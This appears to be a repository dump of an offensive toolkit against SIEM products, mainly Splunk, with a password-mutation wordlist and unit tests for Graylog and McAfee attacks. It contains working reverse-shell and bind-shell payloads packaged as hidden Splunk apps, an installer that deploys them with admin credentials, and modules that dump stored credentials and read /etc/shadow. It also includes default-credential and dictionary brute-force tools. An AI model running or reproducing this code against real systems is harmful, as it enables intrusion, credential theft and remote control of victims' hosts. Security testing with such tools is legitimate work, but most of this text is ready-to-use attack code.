660 | Admin121 661 | Admin122 662 | Admin123 663 | Admin124 664 | Admin125 665 | Admin126 666 | Admin127 667 | Admin128 668 | Admin129 669 | Admin120 670 | Admin12! 671 | Admin12@ 672 | Admin12# 673 | Admin12$ 674 | Admin12% 675 | Admin12^ 676 | Admin12& 677 | Admin12* 678 | Admin12? 679 | @dmin121 680 | @dmin122 681 | @dmin123 682 | @dmin124 683 | @dmin125 684 | @dmin126 685 | @dmin127 686 | @dmin128 687 | @dmin129 688 | @dmin120 689 | @dmin12! 690 | @dmin12@ 691 | @dmin12# 692 | @dmin12$ 693 | @dmin12% 694 | @dmin12^ 695 | @dmin12& 696 | @dmin12* 697 | @dmin12? 698 | 4dmin121 699 | 4dmin122 700 | 4dmin123 701 | 4dmin124 702 | 4dmin125 703 | 4dmin126 704 | 4dmin127 705 | 4dmin128 706 | 4dmin129 707 | 4dmin120 708 | 4dmin12! 709 | 4dmin12@ 710 | 4dmin12# 711 | 4dmin12$ 712 | 4dmin12% 713 | 4dmin12^ 714 | 4dmin12& 715 | 4dmin12* 716 | 4dmin12? 717 | admin1231 718 | admin1232 719 | admin1233 720 | admin1234 721 | admin1235 722 | admin1236 723 | admin1237 724 | admin1238 725 | admin1239 726 | admin1230 727 | admin123! 728 | admin123@ 729 | admin123# 730 | admin123$ 731 | admin123% 732 | admin123^ 733 | admin123& 734 | admin123* 735 | admin123? 736 | Admin1231 737 | Admin1232 738 | Admin1233 739 | Admin1234 740 | Admin1235 741 | Admin1236 742 | Admin1237 743 | Admin1238 744 | Admin1239 745 | Admin1230 746 | Admin123! 747 | Admin123@ 748 | Admin123# 749 | Admin123$ 750 | Admin123% 751 | Admin123^ 752 | Admin123& 753 | Admin123* 754 | Admin123? 755 | @dmin1231 756 | @dmin1232 757 | @dmin1233 758 | @dmin1234 759 | @dmin1235 760 | @dmin1236 761 | @dmin1237 762 | @dmin1238 763 | @dmin1239 764 | @dmin1230 765 | @dmin123! 766 | @dmin123@ 767 | @dmin123# 768 | @dmin123$ 769 | @dmin123% 770 | @dmin123^ 771 | @dmin123& 772 | @dmin123* 773 | @dmin123? 774 | 4dmin1231 775 | 4dmin1232 776 | 4dmin1233 777 | 4dmin1234 778 | 4dmin1235 779 | 4dmin1236 780 | 4dmin1237 781 | 4dmin1238 782 | 4dmin1239 783 | 4dmin1230 784 | 4dmin123! 
785 | 4dmin123@ 786 | 4dmin123# 787 | 4dmin123$ 788 | 4dmin123% 789 | 4dmin123^ 790 | 4dmin123& 791 | 4dmin123* 792 | 4dmin123? 793 | -------------------------------------------------------------------------------- /splunk/installshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Install Reverse Shell or Bind Shell from App 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import getpass 8 | import globals 9 | import os 10 | import sys 11 | import tarfile 12 | import threading 13 | import splunklib.binding as binding 14 | from colorama import Fore, Style 15 | from xml.etree import ElementTree 16 | from http.server import SimpleHTTPRequestHandler 17 | from http.server import HTTPServer 18 | 19 | sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "..")) 20 | 21 | # %%%%%%%%%%% Constants %%%%%%%%%%%# 22 | 23 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 24 | 25 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 26 | 27 | 28 | def install_app(ip, port, appname): 29 | splunk_username = input("[!] Enter Splunk Admin (Default admin): ") 30 | splunk_password = getpass.getpass("[!] Enter Password: ") 31 | local_ip = input("[!] 
Enter your local IP address: ") 32 | 33 | context = binding.connect( 34 | host=ip, 35 | port=port, 36 | username=splunk_username, 37 | password=splunk_password) 38 | 39 | response = context.get('apps/local') 40 | if response.status != 200: 41 | raise Exception("%d (%s)" % (response.status, response.reason)) 42 | 43 | body = response.body.read() 44 | data = ElementTree.XML(body) 45 | apps = data.findall( 46 | "{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}title") 47 | 48 | globals.splunk_messages(1) 49 | 50 | for app in apps: 51 | print("[*] " + app.text) 52 | print(SEPARATOR) 53 | 54 | basedir = os.path.dirname(os.path.abspath(__file__)) 55 | if appname == "rshell.tar.gz": # linux python reverse shell 56 | relpath = 'rshell/bin/reverse_shell.py' 57 | 58 | with open( 59 | os.path.join(basedir, 'reverse_shell_original.py')) as f: 60 | # replace the attacker ip 61 | new_text = f.read().replace('REPLACEME', str(local_ip)) 62 | with open(os.path.join(basedir, relpath), "w+") as f: 63 | f.write(new_text) 64 | with tarfile.open(os.path.join(basedir, 'rshell.tar.gz'), "w:gz") as tar: 65 | tar.add(os.path.join(basedir, 'rshell'), arcname='rshell') 66 | 67 | if appname == "wrshell.tar.gz": # windows python reverse shell 68 | relpath = 'wrshell/bin/reverse_shell_win.py' 69 | 70 | with open(os.path.join(basedir, 'reverse_shell_win_original.py')) as f: 71 | new_text = f.read().replace('REPLACEME', str(local_ip)) 72 | with open(os.path.join(basedir, relpath), "w+") as f: 73 | f.write(new_text) 74 | with tarfile.open(os.path.join(basedir, 'wrshell.tar.gz'), "w:gz") as tar: 75 | tar.add(os.path.join(basedir, 'wrshell'), arcname='wrshell') 76 | 77 | os.chdir(basedir) 78 | port = 9337 79 | server = HTTPServer(('', port), SimpleHTTPRequestHandler) 80 | thread = threading.Thread(target=server.serve_forever) 81 | thread.daemon = True 82 | try: 83 | thread.start() 84 | except KeyboardInterrupt: 85 | server.shutdown() 86 | sys.exit(0) 87 | 88 | if appname != "None": 89 
| 90 | apptgz = 'http://' + local_ip + ':' + str(port) + '/' + appname 91 | response2 = context.post('apps/local', filename='true', name=apptgz) 92 | if response2.status != 201: # 201 is the success code 93 | raise Exception("%d (%s)" % (response2.status, response2.reason)) 94 | 95 | body2 = response2.body.read() 96 | data2 = ElementTree.XML(body2) 97 | results = data2.findall( 98 | "{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}title") 99 | 100 | for result in results: 101 | globals.splunk_messages(2, result.text) 102 | server.shutdown() 103 | 104 | if ("rshell.tar.gz" or "wrshell.tar.gz") == appname: # reverse shells 105 | print( 106 | Fore.RED + Style.BRIGHT + 107 | "[!] Please start a listener on the attacker host " 108 | "port 12345, for example: nc -lvp 12345") 109 | if ("bshell.tar.gz" or "wbshell.tar.gz" or "wbshellexe.tar.gz") == appname: 110 | # bind shells 111 | print( 112 | Fore.RED + Style.BRIGHT + 113 | "[!] Please connect to the victim host on port " 114 | "12346, for example: nc -v " + ip + " 12346") 115 | if appname == "wadduser.tar.gz": # windows adduser 116 | print( 117 | Fore.RED + Style.BRIGHT + 118 | "[!] Administrator user added on the victim host " + 119 | ip + ", user: siemadmin with password: siemadmin123$") 120 | print(SEPARATOR) 121 | 122 | else: 123 | globals.splunk_messages(3) 124 | 125 | # %%%%%%%%%% The End %%%%%%%%%%# 126 | -------------------------------------------------------------------------------- /splunk/obtainpwds.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain Splunk Stored Credentials 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import sys 8 | import getpass 9 | import globals 10 | import splunklib.client as client 11 | 12 | sys.path.append('../') 13 | 14 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 15 | 16 | 17 | def obtain_credentials(ip, port): 18 | 19 | splunk_admin = input("[!] 
Enter Splunk Admin (Default admin): ") 20 | splunk_password = getpass.getpass("[!] Enter Splunk Password: ") 21 | 22 | splunk_service = client.connect( 23 | host=ip, port=port, 24 | username=splunk_admin, password=splunk_password) 25 | cred_sep = "``splunk_cred_sep``" 26 | 27 | storage_passwords = splunk_service.storage_passwords 28 | globals.splunk_messages(4) 29 | 30 | for credential in storage_passwords: 31 | # new format rest credential 32 | if cred_sep in credential.name and cred_sep not in credential.clear_password: 33 | 34 | username = credential.username.replace(cred_sep, '') 35 | username = username[:(len(username) - 1)] 36 | mess = [ 37 | credential.name.replace(cred_sep, ''), username, 38 | credential.encr_password, credential.clear_password] 39 | globals.splunk_messages(5, mess) 40 | 41 | if cred_sep not in credential.name: # old format credential 42 | mess = [ 43 | credential.name, credential.username, 44 | credential.encr_password, credential.clear_password] 45 | globals.splunk_messages(5, mess) 46 | 47 | # %%%%%%%%%% The End %%%%%%%%%%# 48 | -------------------------------------------------------------------------------- /splunk/obtainsplunkinfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain Splunk Version and Information from Web Interface 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import re 8 | import json 9 | import globals 10 | import urllib3 11 | import logging 12 | import requests 13 | 14 | # %%%%%%%%%%%% Constants %%%%%%%%%%%%%# 15 | 16 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 18 | 19 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 20 | 21 | 22 | def obtain_splunk_info(ip, port): 23 | 24 | prefix = "http://" 25 | ssl = 0 26 | 27 | if port == "8443": 28 | ssl = 1 29 | prefix = "https://" 30 | 31 | url = prefix + ip + ":" + port 32 | 33 | try: 34 | if ssl: 35 | response = 
requests.get(url, verify=False) 36 | else: 37 | response = requests.get(url) 38 | 39 | data = response.text 40 | json_data = re.findall(r'"content".*?:(.*?)}].*?"generator"', data) 41 | services_info = json.loads(json_data[0]) 42 | services_session = json.loads(json_data[1]) 43 | config_web = json.loads(json_data[2]) 44 | globals.splunk_messages(6) 45 | 46 | for x in services_info: 47 | print("[*] " + str(x) + ": " + str(services_info[x])) 48 | globals.splunk_messages(7) 49 | 50 | for x in services_session: 51 | print("[*] " + str(x) + ": " + str(services_session[x])) 52 | globals.splunk_messages(8) 53 | 54 | for x in config_web: 55 | print("[*] " + str(x) + ": " + str(config_web[x])) 56 | 57 | except Exception as e: 58 | logging.error(e, exc_info=True) 59 | 60 | # %%%%%%%%%% The End %%%%%%%%%%# 61 | -------------------------------------------------------------------------------- /splunk/obtainsysteminfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain Splunk System Information 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import sys 8 | import getpass 9 | import globals 10 | import splunklib.client as client 11 | 12 | sys.path.append('../') 13 | 14 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 15 | 16 | 17 | def obtain_system_info(ip, port): 18 | 19 | splunk_admin = input("[!] Enter Splunk Admin (Default admin): ") 20 | splunk_password = getpass.getpass("[!] Enter Splunk Password: ") 21 | 22 | splunk_service = client.connect( 23 | host=ip, port=port, 24 | username=splunk_admin, password=splunk_password) 25 | content = splunk_service.info 26 | 27 | globals.splunk_messages(6) 28 | 29 | for key in sorted(content.keys()): 30 | value = content[key] 31 | if isinstance(value, list): 32 | print("[*] %s:" % key) 33 | for item in value: 34 | print("[!] 
%s" % item) 35 | else: 36 | print("[*] %s: %s" % (key, value)) 37 | 38 | globals.splunk_messages(8) 39 | content = splunk_service.settings.content 40 | 41 | for key in sorted(content.keys()): 42 | value = content[key] 43 | print("[*] %s: %s" % (key, value)) 44 | 45 | # %%%%%%%%%% The End %%%%%%%%%%# 46 | -------------------------------------------------------------------------------- /splunk/readfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # In Linux installations read /etc/shadow file 4 | # from the host where Splunk is installed 5 | 6 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 7 | 8 | import sys 9 | import getpass 10 | import globals 11 | import splunklib.client as client 12 | 13 | sys.path.append('../') 14 | 15 | # %%%%%%%%%%%% Constants %%%%%%%%%%%%%# 16 | 17 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 18 | 19 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 20 | 21 | 22 | def read_file(ip, port): 23 | 24 | splunk_admin = input("[!] Enter Splunk Admin (Default admin): ") 25 | splunk_password = getpass.getpass("[!] 
Enter Splunk Password: ") 26 | splunk_service = client.connect( 27 | host=ip, port=port, 28 | username=splunk_admin, password=splunk_password) 29 | name = "siemsfworkidx" 30 | 31 | if name not in splunk_service.indexes: 32 | siemsfworkidx = splunk_service.indexes.create("siemsfworkidx") 33 | else: 34 | siemsfworkidx = splunk_service.indexes[name] 35 | 36 | # Splunk can be installed on debian, centos, ubuntu and redhat, 37 | # the shadow file is /etc/shadow 38 | 39 | uploadfile = "/etc/shadow" 40 | siemsfworkidx.upload(uploadfile) 41 | 42 | globals.splunk_messages(9) 43 | 44 | # the file is uploaded in the index siemsfworkidx, 45 | # the count=0 is for returning all events 46 | 47 | searchquery_oneshot = "search index = siemsfworkidx | stats list(_raw)" 48 | kwargs_oneshot = {"output_mode": "csv", "count": 0} 49 | oneshotsearch_results = splunk_service.jobs.oneshot( 50 | searchquery_oneshot, **kwargs_oneshot) 51 | results = str(oneshotsearch_results.read()) 52 | data = results.replace('"', '') 53 | data2 = data.replace('list(_raw)', '') 54 | shadow = data2.split(' ') 55 | 56 | for i in shadow: 57 | if not i.startswith('\n'): 58 | print("[*] " + i) 59 | else: 60 | print("[*] " + i.replace('\n', '')) 61 | 62 | print(SEPARATOR) 63 | print( 64 | "[!] 
Please wait a few seconds for the index to be cleaned and deleted [!]") 65 | 66 | timeout = 60 67 | siemsfworkidx.clean(timeout) 68 | siemsfworkidx.delete() 69 | 70 | # %%%%%%%%%% The End %%%%%%%%%%# 71 | -------------------------------------------------------------------------------- /splunk/reverse_shell_original.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | """ Reverse PTY Shell """ 3 | 4 | import os 5 | import pty 6 | import socket 7 | 8 | attackerip = "REPLACEME" 9 | attackerport = "12345" 10 | 11 | 12 | def main(): 13 | s = socket.socket() 14 | s.connect((attackerip,int(attackerport))) 15 | [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] 16 | pty.spawn('/bin/bash') 17 | 18 | 19 | if __name__ == "__main__": 20 | main() 21 | -------------------------------------------------------------------------------- /splunk/reverse_shell_win_original.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | """ Splunk Windows/Linux Python Reverse Shell """ 4 | 5 | # Usage: nc -lvp 12345 in the attacker machine 6 | # to set up the listener. Enter quit to end session 7 | 8 | import socket 9 | import subprocess 10 | 11 | HOST = 'REPLACEME' 12 | PORT = 12345 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | s.connect((HOST, PORT)) 16 | s.send('[*] ======================================================= [*]\n'. 17 | encode()) 18 | s.send('[*] Connection Established!\n'.encode()) 19 | s.send('[*] ======================================================= [*]\n'. 
20 | encode()) 21 | s.send('$'.encode()) 22 | 23 | while 1: 24 | data = s.recv(1024) 25 | if "quit" in data.decode(): 26 | break 27 | proc = subprocess.Popen( 28 | data.decode(), shell=True, stdout=subprocess.PIPE, 29 | stderr=subprocess.PIPE, stdin=subprocess.PIPE) 30 | stdout_value = proc.stdout.read() + proc.stderr.read() 31 | s.send(stdout_value) 32 | s.send('$'.encode()) 33 | 34 | s.close() 35 | -------------------------------------------------------------------------------- /splunk/rshell/default/app.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Splunk app configuration file 3 | # 4 | 5 | [ui] 6 | is_visible = 0 7 | label = rshell 8 | 9 | [launcher] 10 | author = Yamila Levalle 11 | description = Splunnk Linux Reverse Shell 12 | version = 1.0.1 13 | 14 | -------------------------------------------------------------------------------- /splunk/rshell/default/inputs.conf: -------------------------------------------------------------------------------- 1 | [script://$SPLUNK_HOME/etc/apps/rshell/bin/reverse_shell.py] 2 | 3 | disabled = false 4 | interval = 10 5 | sourcetype = reverse_shell 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /splunk/testovacredentials.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Splunk Test Default VMWare OVA SSH Credentials: 4 | # root/changemenow and splunk/changeme 5 | 6 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 7 | 8 | import nmap 9 | import globals 10 | import logging 11 | import paramiko 12 | 13 | 14 | from globals import SSH_PORT 15 | 16 | # %%%%%%%%%% Functions %%%%%%%%%# 17 | 18 | 19 | def ova_credentials(ip, user, password): 20 | 21 | ssh = paramiko.SSHClient() 22 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 23 | mess = [user, password] 24 | try: 25 | ssh.connect(ip, username=user, password=password) 26 | globals.splunk_messages(10) 27 | 
globals.messages(9, mess) 28 | 29 | except paramiko.AuthenticationException: 30 | globals.splunk_messages(11, mess) 31 | 32 | 33 | def test_ova_credentials(ip): 34 | 35 | nm = nmap.PortScanner() 36 | 37 | try: 38 | nm.scan(hosts=ip, arguments='-sT -T4 -p 22') 39 | 40 | if nm[ip]['tcp'][SSH_PORT]['state'] == 'open': 41 | ova_credentials(ip, "splunk", "changeme") 42 | ova_credentials(ip, "root", "changemenow") 43 | 44 | except Exception as e: 45 | logging.error(e, exc_info=True) 46 | 47 | # %%%%%%%%%% The End %%%%%%%%%%# 48 | -------------------------------------------------------------------------------- /splunk/wadduser.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElevenPaths/siemframework/8b317d152f8ae80565a4ee00106c73ee0e1a3381/splunk/wadduser.tar.gz -------------------------------------------------------------------------------- /splunk/wbshell.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElevenPaths/siemframework/8b317d152f8ae80565a4ee00106c73ee0e1a3381/splunk/wbshell.tar.gz -------------------------------------------------------------------------------- /splunk/wbshellexe.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElevenPaths/siemframework/8b317d152f8ae80565a4ee00106c73ee0e1a3381/splunk/wbshellexe.tar.gz -------------------------------------------------------------------------------- /splunk/wrshell/default/app.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Splunk app configuration file 3 | # 4 | 5 | [ui] 6 | is_visible = 0 7 | label = wrshell 8 | 9 | [launcher] 10 | author = Yamila Levalle 11 | description = Splunk Windows Reverse Shell 12 | version = 1.0.1 13 | 14 | -------------------------------------------------------------------------------- 
/splunk/wrshell/default/inputs.conf: -------------------------------------------------------------------------------- 1 | [script://$SPLUNK_HOME/etc/apps/wrshell/bin/reverse_shell_win.py] 2 | 3 | disabled = false 4 | interval = 5 5 | sourcetype = reverse_shell_win 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /test/dict.txt: -------------------------------------------------------------------------------- 1 | changeme 2 | McAfee_4ttack 3 | Splunk 4 | 0ssim_ 5 | Q2adar+ 6 | -------------------------------------------------------------------------------- /test/scan_mcafee_ssh: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | cpe:/a:openbsd:openssh:6.6.1p1cpe:/o:linux:linux_kernel 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /test/test_graylog.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import requests_mock 6 | 7 | from io import StringIO 8 | from unittest.mock import patch 9 | from graylog.bruteforcegraylog import graylog_brute 10 | from graylog.testcredentialsgraylog import default_web_credentials 11 | from graylog.testcredentialsgraylog import default_ssh_credentials 12 | from graylog.obtaincredentialsrestapi import obtain_ldap_credentials 13 | 14 | 15 | class TestSiemsframework(unittest.TestCase): 16 | 17 | def setUp(self): 18 | self.ip = '192.168.1.8' 19 | self.port = '9000' 20 | self.url_base = 'http://192.168.1.8:9000' 21 | self.stdout = 'sys.stdout' 22 | 23 | @requests_mock.mock() 24 | def test_graylog_brute(self, response): 25 | url = self.url_base + "/api/system/sessions" 26 | result = "\n\n\x1b[32m\x1b[1m[*] ==================================" \ 27 | "=========================================================" \ 28 | "=================== [*]" \ 29 | "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \ 30 | "\n\x1b[32m\x1b[1m[*] ====================================" \ 31 | "=========================================================" \ 32 | "================= [*]"\ 33 | "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] =========================" \ 34 | "=========================================================" \ 35 | "============================ [*]"\ 36 | "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \ 37 | "\n\x1b[33m[!] 
Password: \x1b[31m\x1b[1madmin" \
                 "\n\x1b[32m\x1b[1m[*] ====================================" \
                 "==========================================================" \
                 "================ [*]\x1b[0m\n"

        response.post(url, status_code=200)
        with patch(self.stdout, new=StringIO()) as graylog_out:
            graylog_brute(self.ip, self.port)
        self.assertEqual(graylog_out.getvalue(), result)

    @requests_mock.mock()
    def test_web_credentials(self, response):
        """Default web login (admin/admin) is reported when the session API accepts it.

        ``POST /api/system/sessions`` is mocked to answer 200, so
        ``default_web_credentials`` must print the "Default Credentials
        Found!" banner. No real HTTP traffic leaves the test process.
        """
        url = self.url_base + "/api/system/sessions"
        result = "\x1b[32m\x1b[22m[*] ======================================" \
                 "==========================================================" \
                 "============== [*]" \
                 "\n\x1b[32m\x1b[22m[!] Graylog Web Interface Default " \
                 "Credentials Found!" \
                 "\n\x1b[32m\x1b[22m[*] ===================================" \
                 "==========================================================" \
                 "================= [*]" \
                 "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ========================" \
                 "=========================================================" \
                 "============================= [*]" \
                 "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \
                 "\n\x1b[33m[!] Password: \x1b[31m\x1b[1madmin" \
                 "\n\x1b[32m\x1b[1m[*] ===================================" \
                 "=========================================================" \
                 "================== [*]\x1b[0m\n"

        response.post(url, status_code=200)
        with patch(self.stdout, new=StringIO()) as graylog_out:
            default_web_credentials(self.ip, self.port)
        self.assertEqual(graylog_out.getvalue(), result)

    def test_ssh_credentials(self):
        """Default SSH login (ubuntu/ubuntu) is reported when connect succeeds.

        ``paramiko.SSHClient.connect`` is patched to a no-op returning True,
        so no SSH session is opened towards ``self.ip``.
        """
        result = "\x1b[32m\x1b[22m[*] ====================================" \
                 "========================================================" \
                 "================== [*]" \
                 "\n\x1b[32m\x1b[22m[!] Graylog SSH Default Credentials " \
                 "Found!" \
                 "\n\x1b[32m\x1b[22m[*] ==================================" \
                 "========================================================" \
                 "==================== [*]" \
                 "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] =======================" \
                 "========================================================" \
                 "=============================== [*]" \
                 "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1mubuntu" \
                 "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mubuntu" \
                 "\n\x1b[32m\x1b[1m[*] ===================================" \
                 "=========================================================" \
                 "================== [*]\x1b[0m\n"

        with patch('sys.stdout', new=StringIO()) as graylog_out,\
                patch('paramiko.SSHClient.connect', autospec=True) as mock_ssh:
            mock_ssh.return_value = True
            default_ssh_credentials(self.ip)
        self.assertEqual(graylog_out.getvalue(), result)

    @requests_mock.mock()
    def test_credentials_restapi(self, response):
        """LDAP bind and AWS plugin secrets read from the REST API are echoed.

        Both ``GET`` endpoints are mocked with canned JSON fragments and
        ``getpass.getpass`` is patched so the admin password prompt does not
        block. The key/secret values below are test fixtures only; keep them
        obviously synthetic so secret scanners do not flag the suite.
        """
        urlldap = self.url_base + "/api/system/ldap/settings?pretty=true"
        urlaws = self.url_base + "/api/system/cluster_config/" \
                                 "org.graylog.aws.config." \
                                 "AWSPluginConfiguration?pretty=true"
        ldap = '\n "enable" : true,' \
               '\n "system_username" : "uid=pruebaldap, ou=system",' \
               '\n "system_password": "pruebaldap"'
        aws = '\n "lookups_enable" : false,' \
              '\n "access_key" : "ALIMAYELELLAV7IDEA",' \
              '\n "secret_key": "ElevenPaths/LABORATORY/Latam"'

        result = "\x1b[32m\x1b[22m[*] ====================================" \
                 "========================================================" \
                 "================== [*]" \
                 "\n\x1b[32m\x1b[22m[!] Graylog LDAP Settings and Credentials" \
                 "\n\x1b[32m\x1b[22m[*] ====================================" \
                 "==========================================================" \
                 "================ [*]" \
                 "\x1b[0m\n\n[!] \"enable\" : true," \
                 "\n[!] \"system_username\" : \"uid=pruebaldap, ou=system\"," \
                 "\n[!] \"system_password\": \"pruebaldap\"" \
                 "\n\x1b[32m\x1b[22m[*] ===================================" \
                 "=========================================================" \
                 "================== [*]" \
                 "\n\x1b[32m\x1b[22m[!] Graylog AWS Settings and Credentials" \
                 "\n\x1b[32m\x1b[22m[*] ===================================" \
                 "=========================================================" \
                 "================== [*]" \
                 "\x1b[0m\n\n[!] \"lookups_enable\" : false," \
                 "\n[!] \"access_key\" : \"ALIMAYELELLAV7IDEA\"," \
                 "\n[!] \"secret_key\": \"ElevenPaths/LABORATORY/Latam\"\n"

        response.get(urlldap, status_code=200, text=ldap)
        response.get(urlaws, status_code=200, text=aws)
        with patch(self.stdout, new=StringIO()) as graylog_out:
            with patch('getpass.getpass', return_value='admin'):
                obtain_ldap_credentials(self.ip, self.port)
        self.assertEqual(graylog_out.getvalue(), result)


if __name__ == "__main__":
    unittest.main()

# %%%%%%%%%% The End %%%%%%%%%%#


--------------------------------------------------------------------------------
/test/test_mcafee.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import unittest
import requests_mock

from io import StringIO
from unittest.mock import patch

from mcafee.bruteforcemcafee import mcafee_brute
from mcafee.bruteforcessh import mcafee_ssh_brute


class TestSiemsframework(unittest.TestCase):
    """Tests for the McAfee ESM modules; every network call is mocked."""

    def setUp(self):
        self.ip = '192.168.1.8'
        self.port = '443'
        self.url_base = 'https://192.168.1.8:443'
        self.stdout = 'sys.stdout'
        # Browser-like request headers for the ESM web client. Not referenced
        # by the tests in this file; kept as a fixture for future tests.
        self.headers = {
            'Accept': 'application/json,text/plain,*/*',
            'DNT': '1',
            'Host': self.ip,
            'Origin': self.url_base,
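'Referer': self.url_base,
            'Content-Type': 'application/json;charset=utf-8',
            'Connection': 'keep - alive',
            'X-Xsrf-Token': 'null'
        }

    @requests_mock.mock()
    def test_mcafee_brute(self, response):
        """Dictionary attack prints the success banner for an accepted pair.

        ``POST /ess`` is mocked to 200 and ``POST /rs/esm/v2/login`` to 201,
        so every attempt is accepted; the banner presumably shows whichever
        pair the module tries first (expected: NGCP / hs+&8:fiY91). Nothing
        leaves the test process.
        """
        url1 = self.url_base + '/ess'
        url2 = self.url_base + '/rs/esm/v2/login'

        response.post(url1, status_code=200)
        response.post(url2, status_code=201)

        result = "\n\n\x1b[32m\x1b[1m[*] =================================" \
                 "========================================================" \
                 "===================== [*]" \
                 "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \
                 "\n\x1b[32m\x1b[1m[*] ====================================" \
                 "=========================================================" \
                 "================= [*]" \
                 "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ========================" \
                 "=========================================================" \
                 "============================= [*]" \
                 "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1mNGCP" \
                 "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mhs+&8:fiY91" \
                 "\n\x1b[32m\x1b[1m[*] ===================================" \
                 "=========================================================" \
                 "================== [*]\x1b[0m\n"

        with patch(self.stdout, new=StringIO()) as mcafee_out:
            mcafee_brute(self.ip, self.port)
        self.assertEqual(mcafee_out.getvalue(), result)

    def test_mcafee_ssh_brute(self):
        """SSH dictionary attack against a canned nmap result with 22/tcp open.

        ``nmap.PortScanner.scan`` is patched to return ``nm`` and
        ``paramiko.SSHClient.connect`` is patched to a no-op, so neither a
        port scan nor an SSH session is started. The expected banner is
        "Not Successful" even though connect never fails; presumably because
        the patched ``scan`` does not populate the real scanner's
        ``_scan_result`` (the assignment below lands on the mock, not on the
        PortScanner instance) -- confirm against mcafee/bruteforcessh.py.
        """
        nm = {
            'nmap': {
                'command_line': 'nmap -oX - -sT -T4 -p 22 192.168.1.8',
                'scaninfo': {
                    'tcp': {'method': 'connect', 'services': '22'}},
                'scanstats': {
                    'timestr': 'Sat May 16 17:00:54 2020',
                    'elapsed': '0.03', 'uphosts': '1', 'downhosts': '0',
                    'totalhosts': '1'}
            },
            'scan': {
                '192.168.1.8': {
                    'hostnames': [{'name': '', 'type': ''}],
                    'addresses': {'ipv4': '192.168.1.8'},
                    'vendor': {},
                    'status': {'state': 'up', 'reason': 'syn-ack'},
                    'tcp': {
                        22: {
                            'state': 'open',
                            'reason': 'syn-ack',
                            'name': 'ssh',
                            'product': '',
                            'version': '',
                            'extrainfo': '',
                            'conf': '3',
                            'cpe': ''}}}}}
        result = "\n\n\x1b[32m\x1b[1m[*] =================================" \
                 "========================================================" \
                 "===================== [*]" \
                 "\n\x1b[31m\x1b[1m[!] Dictionary Attack Not Successful" \
                 "\n\x1b[32m\x1b[1m[*] ====================================" \
                 "========================================================" \
                 "================== [*]\x1b[0m\n"

        with patch('sys.stdout', new=StringIO()) as mcafee_out, \
                patch('nmap.PortScanner.scan') as mock_nmap, \
                patch('paramiko.SSHClient.connect', autospec=True) as mock_ssh:
            mock_nmap.return_value = nm
            mock_nmap._scan_result = nm
            mock_ssh.return_value = True
            mcafee_ssh_brute(self.ip)
        self.assertEqual(mcafee_out.getvalue(), result)


if __name__ == "__main__":
    unittest.main()

# %%%%%%%%%% The End %%%%%%%%%%#


--------------------------------------------------------------------------------
/test/test_ossim.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import unittest
import requests_mock

from io import StringIO
from unittest.mock import patch

from ossim.bruteforceossim import ossim_brute


class TestSiemsframework(unittest.TestCase):
    """Tests for the AlienVault OSSIM module; HTTP goes through requests_mock."""

    def setUp(self):
        self.ip = '192.168.1.8'
        self.port = '443'
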